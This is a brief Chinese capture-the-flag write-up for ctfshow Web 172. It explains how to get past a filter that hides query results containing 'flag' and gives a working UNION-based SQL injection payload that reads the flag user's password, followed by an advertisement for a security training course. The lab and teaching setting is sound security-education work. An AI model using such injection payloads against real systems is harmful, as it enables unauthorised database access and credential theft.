SQL注入:flag不能出现在查询当中
Web 172:
//检查结果是否有flag if($row->username!=='flag'){ $ret['msg']='查询成功'; }
这里是检查我们查询的是否存在flag字样
我们可以使用加密:
To_base64()这样的方式绕过,但也可以直接强制转化username为1
99' union select 1,password from ctfshow_user2 where username='flag'%23
Tips:鼠标经过代码时会出现工具栏,工具栏上方有一键复制代码的功能哦~天云网络培训,专注于网络空间安全相关培训,并提供相关课程的在线培训 报名微信 tyedu1
天云网络培训 » SQL注入:flag不能出现在查询当中
天云网络培训 » SQL注入:flag不能出现在查询当中